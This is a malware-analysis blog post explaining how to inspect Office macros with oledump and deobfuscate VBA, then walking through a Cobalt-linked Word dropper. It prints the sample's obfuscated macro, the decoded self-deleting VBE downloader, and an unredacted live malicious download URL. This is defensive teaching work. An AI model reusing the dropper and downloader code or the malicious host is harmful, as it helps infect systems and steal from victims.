Malicious Microsoft Office Document Analysis and Analyze a Cobalt Sample

Tho Le
Oct 12, 2019

The article aims to share some insights into analyzing malicious Microsoft Office files. It contains 3 parts as below:

  • Microsoft Office Document Analysis: provides an overview of Office file formats and the tools used to analyze them.
  • Macro (VBA, Visual Basic for Applications) Analysis: presents some tips for analyzing and debugging macros.
  • Analyze a Cobalt sample: applies knowledge shared above to deal with a real sample.

Microsoft Office Document Analysis

Prior to Microsoft Office 2007, Office files used a legacy binary format called OLE2, a compound file format (for example, *.doc, *.xls and *.ppt).

Starting with Office 2007, Microsoft uses XML-based file formats (for example, *.docx, *.xlsx and *.pptx), which are simply ZIP archives. After decompression, all plaintext parts are viewable. For backward compatibility, OLE2 is still supported: OLE2 files (*.bin) can be found among the decompressed files.
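As a rough illustration of the point above, the sketch below opens an Office file as a ZIP archive and lists the members that begin with the OLE2 signature bytes (D0 CF 11 E0 A1 B1 1A E1). The function names and the tiny demo archive are made up for this example; in real macro-enabled files the embedded OLE2 part is typically named vbaProject.bin.

```python
import io
import zipfile

# Signature found at the start of every OLE2 compound file.
OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


def find_ole2_parts(office_bytes: bytes) -> list[str]:
    """Return names of archive members that begin with the OLE2 signature."""
    found = []
    with zipfile.ZipFile(io.BytesIO(office_bytes)) as archive:
        for name in archive.namelist():
            with archive.open(name) as member:
                if member.read(len(OLE2_MAGIC)) == OLE2_MAGIC:
                    found.append(name)
    return found


def build_demo_archive() -> bytes:
    """Build a tiny stand-in archive (NOT a real document) for the demo."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("word/document.xml", "<w:document/>")
        archive.writestr("word/vbaProject.bin", OLE2_MAGIC + b"\x00" * 8)
    return buffer.getvalue()


if __name__ == "__main__":
    print(find_ole2_parts(build_demo_archive()))
```

Any member reported this way can then be extracted and handed to an OLE2 parser.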

For malware analysis, OLE2 is the target of interest because macros (a common way to deliver malicious code) can be embedded inside that binary structure. However, its internal structure is quite complex. Fortunately, analysts don’t have to know OLE2’s structure in detail, as multiple tools are available to parse and analyze it.

This article doesn’t aim to list all available tools; it just states the author’s preference. In that sense, “oledump.py”, by Didier Stevens, is introduced because it provides two main benefits: (1) it parses and presents all contents inside an OLE2 file. This is important because macros can reside in SRP streams (a cached version of earlier macro code) or in VBA streams as p-code, which some automatic tools such as olevba can miss. (2) It extracts macros from OLE2 files. For more information, Lenny Zeltser’s cheat sheet and Didier’s blog are good references.

The examination of an OLE2 file starts with the command

oledump.py <filename>

The figure below illustrates the output. In short, the first column is the stream number, and the letter “M” or “m” indicates that the stream contains macros. Hence, stream 7 requires further investigation.

Figure 1: Oledump Output

Analysts can select an interesting stream and extract its macro with the command below; the output is shown in Figure 2.

oledump.py <filename> -s <stream number> -v

Figure 2: Oledump extracts the macro from stream 7

Tips for Macro (VBA) Analysis

Now the suspicious macro is extracted and ready for analysis. A macro is written in VBA (Visual Basic for Applications), which is essentially VBScript with some extra functions tied to Microsoft Office (e.g. Word, Excel, PowerPoint). Therefore, parts of VBA code can be run as a normal VBScript with Wscript.exe or Cscript.exe. Tutorialspoint provides a good introduction to VBA.

Below are some tips for analyzing VBA code:

  • Event identification: VBA is an event-driven programming language; hence, it is important to identify the event that leads to code execution (e.g. button clicked, file opened, mouseover). Notably, AutoOpen (for Word) and Workbook_Open (for Excel) are executed when a file is opened and macros are enabled.
Figure 3: VBA Event Identification
  • Comment removal: Malware writers try to overwhelm analysts by adding numerous comments to VBA code (comments are preceded by the ' character). Those comments are not part of the code; hence, they can be safely ignored or removed.
  • String replacement: malware writers commonly manipulate strings to confuse analysts, for example:
    Set sr = CreateObject(Replace("EOWSEOWchEOWeEOWduEOWleEOW.sEOWeEOWrvEOWiEOWceEOW", "EOW", "")) → creates a Schedule.service object.
  • Variable/function rename: Malware writers like to make your head spin with crazy variable/function names, such as jcoknrvrjwvktuyoedov. Hence, it is really helpful to rename variables and functions to something that reflects their purpose, such as jcoknrvrjwvktuyoedov → new_file.
  • Execute VB script code: a chunk of VB script code (remember, VBA is just VB script tied to Microsoft Office with some extra functionality) may be highly obfuscated and take a lot of time to analyze. A quick way around this is to copy the code to a new file and run it with either Wscript.exe or Cscript.exe.
  • Debugging: Some code makes it difficult to obtain its return values because it uses application-specific calls (as said, VBA is tied to Microsoft Office; PDF analysis is similar, as you face some Adobe calls). By opening the malicious file in its native application (e.g. Word, Excel or PowerPoint), that code can be debugged and its return values examined easily. To debug a Microsoft document, refer to this instruction. OpenOffice can be used instead; however, not all calls are available.
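The string replacement tip can also be applied without running any VBA. The sketch below is one possible way to do it in Python: it finds Replace(...) calls whose three arguments are plain string literals and substitutes the resulting string. The function name is made up for this example, and the regular expression is an assumption that only covers the simple form shown above (no nested calls, no escaped "" quotes, no optional arguments).

```python
import re

# Matches Replace("text", "find", "with") where all three arguments are
# plain string literals without embedded quotes.
REPLACE_CALL = re.compile(
    r'Replace\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)',
    re.IGNORECASE,
)


def resolve_replace_calls(vba_source: str) -> str:
    """Substitute each literal Replace(...) call with its resulting string."""
    # Articles and reports often carry curly quotes; normalise them first.
    normalised = vba_source.replace("\u201c", '"').replace("\u201d", '"')

    def evaluate(match: re.Match) -> str:
        text, find, replacement = match.groups()
        if not find:
            # An empty search string leaves the text unchanged.
            return '"' + text + '"'
        return '"' + text.replace(find, replacement) + '"'

    return REPLACE_CALL.sub(evaluate, normalised)


if __name__ == "__main__":
    line = (
        'Set sr = CreateObject(Replace("EOWSEOWchEOWeEOWduEOWleEOW'
        '.sEOWeEOWrvEOWiEOWceEOW", "EOW", ""))'
    )
    print(resolve_replace_calls(line))
    # Set sr = CreateObject("Schedule.service")
```

Working on the text rather than executing it keeps the obfuscated code inert while the strings are recovered.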

Analyze a Cobalt sample

It is time to get our hands dirty. Let's examine a malicious document that was found just yesterday (2019-10-11 09:59:07 UTC) by the Threat Intelligence community. The file can be found at:

VT URL: https://www.virustotal.com/gui/file/9f7dbeea18f8525bf94d3d877ca433545915f06483b597d84beb2a3cd30589ca/detection

This article doesn’t aim to provide a full analysis of this file (I like to leave the most fun part for readers :), and it is also quite simple). Instead, it walks through the key steps, following the tips above.

Start with oledump to examine all streams inside the Word file. As seen in Figure 4, streams 8 and 9 warrant further investigation as they contain macros.

Figure 4: Examine a Cobalt malicious Word file

Extract the macros from those streams and save them to two files, s8.vbs and s9.vbs, with the commands below:

oledump.py 9f7dbeea18f8525bf94d3d877ca433545915f06483b597d84beb2a3cd30589ca -s 8 -v > s8.vbs

oledump.py 9f7dbeea18f8525bf94d3d877ca433545915f06483b597d84beb2a3cd30589ca -s 9 -v > s9.vbs

Examination of s8.vbs

s8.vbs contains a lot of comments as seen in Figure 5.

Figure 5: s8.vbs examination

Those comments can easily be removed to reveal the code of real interest (applying the comment removal tip).
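Comment removal can be scripted instead of done by hand. The following is a minimal sketch, assuming comments are introduced either by an apostrophe outside a string literal or by a line starting with Rem; the function names and the sample input are made up for illustration and are not taken from s8.vbs. It also drops lines that become empty.

```python
def strip_vba_comment(line: str) -> str:
    """Return the line with any trailing apostrophe comment removed."""
    in_string = False
    for index, char in enumerate(line):
        if char == '"':
            # An escaped "" inside a literal toggles twice, so state stays right.
            in_string = not in_string
        elif char == "'" and not in_string:
            return line[:index].rstrip()
    return line.rstrip()


def strip_vba_comments(source: str) -> str:
    """Remove comment text and drop lines that end up empty."""
    kept = []
    for line in source.splitlines():
        code = strip_vba_comment(line)
        lowered = code.strip().lower()
        if lowered == "rem" or lowered.startswith("rem "):
            continue  # whole-line Rem comment
        if code.strip():
            kept.append(code)
    return "\n".join(kept)


if __name__ == "__main__":
    sample = (
        "Public Function Demo()\n"
        "' filler comment added by the malware writer\n"
        "x = \"it's\" ' trailing comment\n"
        "Rem another filler line\n"
        "End Function"
    )
    print(strip_vba_comments(sample))
```

The apostrophe inside the string literal is preserved because the scan tracks whether it is currently inside double quotes.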

Public Function LtCvdeO()
CWAwmvwl = Replace("UGETUGEEUGEMUGEP", "UGE", "")
tuDCxOiw = Environ(CWAwmvwl) & Replace("\ePIFLrrPIFLorPIFL_loPIFLg.PIFLvPIFLbPIFLe", "PIFL", "")
LtCvdeO = tuDCxOiw
End Function

Here we see signs of string manipulation with the “Replace” function, which can easily be converted back to the original text (applying the string replacement tip).

Replace("UGETUGEEUGEMUGEP", "UGE", "") → "TEMP"

Replace("\ePIFLrrPIFLorPIFL_loPIFLg.PIFLvPIFLbPIFLe", "PIFL", "") → "\error_log.vbe"

So the function LtCvdeO returns the file path for a VBE (encoded VBScript) file. Let's rename it from LtCvdeO to VBE_Drop_Path and use the find/replace function of your text editor to propagate this rename across both s8.vbs and s9.vbs (applying the variable/function rename tip).
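When many names need renaming across several extracted files, a small script can stand in for the editor's find/replace. This is only a sketch: the function name and the mapping are illustrative, matching is whole-word and case-insensitive (VBA identifiers are case-insensitive), and it would also rewrite a name that happens to appear inside a string literal.

```python
import re


def rename_identifiers(source: str, renames: dict[str, str]) -> str:
    """Rename whole-word identifiers according to the given mapping."""
    for old, new in renames.items():
        pattern = re.compile(r"\b" + re.escape(old) + r"\b", re.IGNORECASE)
        # A function is used as the replacement so that the new name is
        # inserted literally, without any escape processing.
        source = pattern.sub(lambda _match, name=new: name, source)
    return source


if __name__ == "__main__":
    renames = {"LtCvdeO": "VBE_Drop_Path"}
    line = "Open Module1.LtCvdeO For Output As #1"
    print(rename_identifiers(line, renames))
    # Open Module1.VBE_Drop_Path For Output As #1
```

Keeping the mapping in one dictionary makes it easy to apply the same renames to every extracted stream.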

Examination of s9.vbs

The script starts with the following code, which opens a file at the path returned by Module1.VBE_Drop_Path (“%TEMP%\error_log.vbe”). Hence, it is clear that this malicious Word file drops a VBE file as its second stage.

Sub Document_Open()
On Error Resume Next

Open Module1.VBE_Drop_Path For Output As #1

It is followed by highly obfuscated code, as below:

bsEZIkCU = bsEZIkCU & Chr((-869 + 1027) / 2) & Chr((-890 + 1006) / 2) & Chr((-841 + 1055) / 2) & Chr((-890 + 1006) / 2) & Chr((-838 + 1058) / 2) & Chr((-884 + 1012) / 2) & Chr((-913 + 983) / 2) & Chr((-884 + 1012) / 2) & Chr((-910 + 986) / 2) & Chr((-905 + 991) / 2) & Chr((-863 + 1033) / 2) & Chr((-870 + 1026) / 2) & Chr((-904 + 992) / 2) & Chr((-861 + 1035) / 2) & Chr((-915 + 981) / 2) & Chr((-828 + 1068) / 2) & Chr((-854 + 1042) / 2) & Chr((-880 + 1016) / 2) & Chr((-841 + 1055) / 2) & Chr((-873 + 1023) / 2)

bsEZIkCU = bsEZIkCU & Chr((-828 + 1068) / 2) & Chr((-895 + 1001) / 2) & Chr((-864 + 1032) / 2) & Chr((-837 + 1059) / 2) & Chr((-881 + 1015) / 2) & Chr((-883 + 1013) / 2) & Chr((-883 + 1013) / 2) & Chr((-887 + 1009) / 2) & Chr((-887 + 1009) / 2) & Chr((-854 + 1042) / 2) & Chr((-913 + 983) / 2) & Chr((-822 + 1074) / 2) & Chr((-884 + 1012) / 2)
Print #1, bsEZIkCU ' bsEZIkCU contains the second-stage code that is written to error_log.vbe

Close #1
Call ucRooOBbx
End Sub

To find the real content of “bsEZIkCU”, there are three main ways: (1) do it manually, which is time-consuming and error-prone; (2) apply the “Execute VB script code” tip, which is fast and far easier than the former approach, and is the way this article uses to derive the second-stage file, error_log.vbe; (3) apply the “Debugging” tip, which can’t be used here because the macro is password protected.
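The manual approach in (1) can also be scripted so that nothing from the sample is executed. The sketch below is not the method used in this article; it is a static alternative that assumes every character is written in the exact form Chr((a + b) / c) seen in the excerpt, with sums that divide evenly. The function name is made up for this example.

```python
import re

# Matches the specific pattern Chr((a + b) / c) used in the sample.
CHR_CALL = re.compile(
    r"Chr\(\(\s*(-?\d+)\s*\+\s*(-?\d+)\s*\)\s*/\s*(\d+)\s*\)",
    re.IGNORECASE,
)


def decode_chr_chain(vba_line: str) -> str:
    """Evaluate each Chr((a + b) / c) call and join the characters."""
    chars = []
    for first, second, divisor in CHR_CALL.findall(vba_line):
        # Integer division is an assumption: the sums in the sample are even.
        chars.append(chr((int(first) + int(second)) // int(divisor)))
    return "".join(chars)


if __name__ == "__main__":
    line = (
        "bsEZIkCU = bsEZIkCU & Chr((-869 + 1027) / 2) "
        "& Chr((-890 + 1006) / 2) & Chr((-841 + 1055) / 2)"
    )
    print(decode_chr_chain(line))
    # O:k
```

The decoded characters look like noise because the dropped file is still VBE-encoded at this point; concatenating the output of every such line would rebuild the contents of error_log.vbe.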

Figure 6: Screenshot of error_log.vbe

The code in ucRooOBbx() and DPoxlCnR(t) sets up a scheduled task. However, it is left for readers to complete the story.

Examination of error_log.vbe

error_log.vbe is an encoded VB script that can be easily decoded with Decoding VBE by Didier Stevens.

After decoding, the real code is revealed as below:

On Error Resume Next
set o=CreateObject("wscript.shell")
Set le = CreateObject(replace("CHIARScCHIARrCHIARiCHIARptCHIARingCHIAR.CHIARFilCHIAReSCHIARysCHIARteCHIARmCHIARObCHIARjecCHIARtCHIAR", "CHIAR", "")) 'Scripting.FileSystemObject
Call le.DeleteFile(WScript.ScriptFullName, True)
t=o.ExpandEnvironmentStrings("%TEMP%") & "\Colors.exe"
set ms=createobject("MSXML2.ServerXMLHTTP.6.0")
set ad=createobject("Adodb.Stream")
ms.Open "GET", "https://www.octetfruitsllc.com/vendor/phpunit/phpunit/src/Util/PHP/avatar.hlpv", False 'Download file to %TEMP%\Colors.exe

As can be seen, the code downloads the next-stage payload from octetfruitsllc[.]com and stores it as %TEMP%\Colors.exe.
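Once a script is decoded, network indicators such as the host above can be pulled out and defanged for safe sharing. The sketch below is one way to do that; the function name is made up, the regular expression is a simple assumption that expects straight quotes around the URL, and the input uses a placeholder domain rather than the real one.

```python
import re
from urllib.parse import urlsplit

# Simple URL pattern: stops at whitespace or a straight quote.
URL_PATTERN = re.compile(r"https?://[^\s\"']+")


def extract_defanged_hosts(script: str) -> list[str]:
    """Return unique hostnames found in the script, with dots defanged."""
    hosts = []
    for url in URL_PATTERN.findall(script):
        host = urlsplit(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return [host.replace(".", "[.]") for host in hosts]


if __name__ == "__main__":
    decoded = 'ms.Open "GET", "https://www.example.com/a/b.bin", False'
    print(extract_defanged_hosts(decoded))
    # ['www[.]example[.]com']
```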

The analysis stops here as it has demonstrated all necessary steps to analyze the Cobalt malicious Word document.


Tho Le

Senior Cyber Security Analyst — be better than the yesterday self